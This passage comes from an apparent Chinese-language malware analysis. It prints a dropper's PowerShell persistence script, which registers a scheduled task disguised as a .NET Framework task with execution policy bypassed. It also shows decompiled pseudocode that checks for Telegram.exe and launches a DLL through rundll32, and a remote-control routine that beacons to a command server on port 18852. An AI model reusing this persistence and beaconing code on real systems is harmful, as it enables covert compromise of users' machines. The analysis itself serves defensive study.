"o""n.vbs
然后释放文件 updated.ps1，内容如下，用于添加计划任务（从 XML 文件注册任务）：
$xmlPath = "C:\Users\123\AppData\Local\PolicyManagement.xml"
$taskName = ".NET Framework NGEN v4.0.30325"
$xmlContent = Get-Content -Path $xmlPath | Out-String
Register-ScheduledTask -Xml $xmlContent -TaskName $taskName
然后调用 shell32_ShellExecuteEx 执行以下命令行：/C powershell -ExecutionPolicy Bypass -File C:\Users\123\AppData\Local\updated.ps1
2.2.5线程4:检测Telegram.exe
// Caption from the write-up: walk the process list looking for Telegram.exe.
//
// Decompiled (IDA-style) pseudocode. Takes a Toolhelp32 snapshot of all
// processes and walks every entry until the opaque helper unk_100145F0
// reports a match. Returns 1 when the helper matched an entry, 0 when the
// snapshot could not be created or the list was exhausted without a match.
//
// Parameters:
//   a1 - forwarded unchanged to unk_100145F0 together with v3; presumably
//        the target process name (Telegram.exe per the caption) -- confirm
//        against the helper's body, which is not shown here.
// Returns: char, 1 = found, 0 = not found / snapshot failed.
//
// Defender note: Toolhelp32 enumeration alone is benign and common; the
// observable worth alerting on is the follow-on action the write-up
// describes (rundll32.exe launching Update.dll once this returns 1).
char __cdecl sub_10013690(int a1)
{
  _DWORD v2[9]; // BYREF -- 36 bytes: the nine DWORD fields that open a PROCESSENTRY32 (dwSize ... dwFlags)
  _BYTE v3[260]; // BYREF -- 260 bytes directly after v2; looks like PROCESSENTRY32::szExeFile[MAX_PATH].
                 // 36 + 260 = 296, which is exactly the dwSize written below, so v2/v3 appear to be
                 // one struct the decompiler split in two -- verify against the stack layout.
  int v4; // snapshot handle; -1 == INVALID_HANDLE_VALUE
  char v5; // result flag, 1 once the helper matches

  v5 = 0;
  // 2 == TH32CS_SNAPPROCESS: snapshot of every process on the system.
  v4 = ((int (__stdcall *)(int, _DWORD))kernel32_CreateToolhelp32Snapshot)(2, 0);
  if ( v4 == -1 )
    return 0;
  v2[0] = 296; // PROCESSENTRY32.dwSize for x86/ANSI -- Process32First fails if this is not set
  if ( ((int (__stdcall *)(int, _DWORD *))kernel32_Process32First)(v4, v2) )
  {
    // Each iteration hands the current entry's name buffer (v3) to the helper;
    // the loop exits either on a match (v5 = 1) or when Process32Next runs out
    // of entries (jump straight to the handle cleanup, v5 stays 0).
    while ( !(unsigned __int8)((int (__cdecl *)(int, _BYTE *))unk_100145F0)(a1, v3) )
    {
      if ( !((int (__stdcall *)(int, _DWORD *))kernel32_Process32Next)(v4, v2) )
        goto LABEL_7;
    }
    v5 = 1;
  }
LABEL_7:
  // The snapshot handle is released on every path that created one; the early
  // return above has nothing to close.
  ((void (__stdcall *)(int))kernel32_CloseHandle)(v4);
  return v5;
}
如果找到该进程，就调用 shell32_ShellExecuteEx 启动 rundll32.exe 执行 C:\Users\123\AppData\Roaming\\Axialis\\Update.dll,TCGamerUpdateMain，即通过该导出函数（TCGamerUpdateMain）执行 config2.ini 的内容。
2.2.6config2.ini
内存加载 config2.ini，然后将其 dump 下来，发现其 PDB 路径信息没有去除。
发现这是未经混淆的版本，功能与上文一致。
2.2.7执行远控
然后执行远控模块 复制代码 隐藏代码int sub_10013450(){_BYTE v1[400]; // BYREF_DWORD v2[8]; // BYREFvoid (*v3)(void); // _DWORD *v4; // BYREFint v5; // int v6; // int v7; // int v8; // int v9; // int v10; // _DWORD *i; // v4 = 0;i = 0;v10 = -1;((void (__stdcall *)(int, _BYTE *))ws2_32_WSAStartup)(514, v1);v2[0] = 0;memset(&v2[4], 0, 16);v2[1] = 2;v2[2] = 1;v2[3] = 6;while ( 1 ){v5 = ((int (__stdcall *)(char *, const char *, _DWORD *, _DWORD **))ws2_32_getaddrinfo)( a2712440155, "18852", v2, &v4);if ( !v5 ){for ( i = v4; i; i = (_DWORD *)i[7] ){v10 = ((int (__stdcall *)(_DWORD, _DWORD, _DWORD))ws2_32_socket)(i[1], i[2], i[3]);if ( v10 != -1 ){v5 = ((int (__stdcall *)(int, _DWORD, _DWORD))ws2_32_connect)(v10, i[6], i[4]);if ( v5 != -1 )break;((void (__stdcall *)(int))ws2_32_closesocket)(v10);v10 = -1;}}((void (__stdcall *)(_DWORD *))ws2_32_FreeAddrInfoW)(v4);if ( v10 != -1 )break;}((void (__stdcall *)(int))kernel32_Sleep)(3000);}v6 = 0;v8 = 4096;v7 = ((int (__cdecl *)(int))unk_1001DEDA)(4096);v9 = 0;while ( 1 ){v6 = ((int (__stdcall *)(int, int, int, _DWORD))ws2_32_recv)(v10, v9 + v7, v8 - v9, 0);if ( v6